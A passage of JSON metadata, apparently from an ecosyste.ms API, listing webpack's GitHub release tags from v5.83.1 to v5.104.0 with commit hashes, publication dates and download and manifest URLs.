itHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000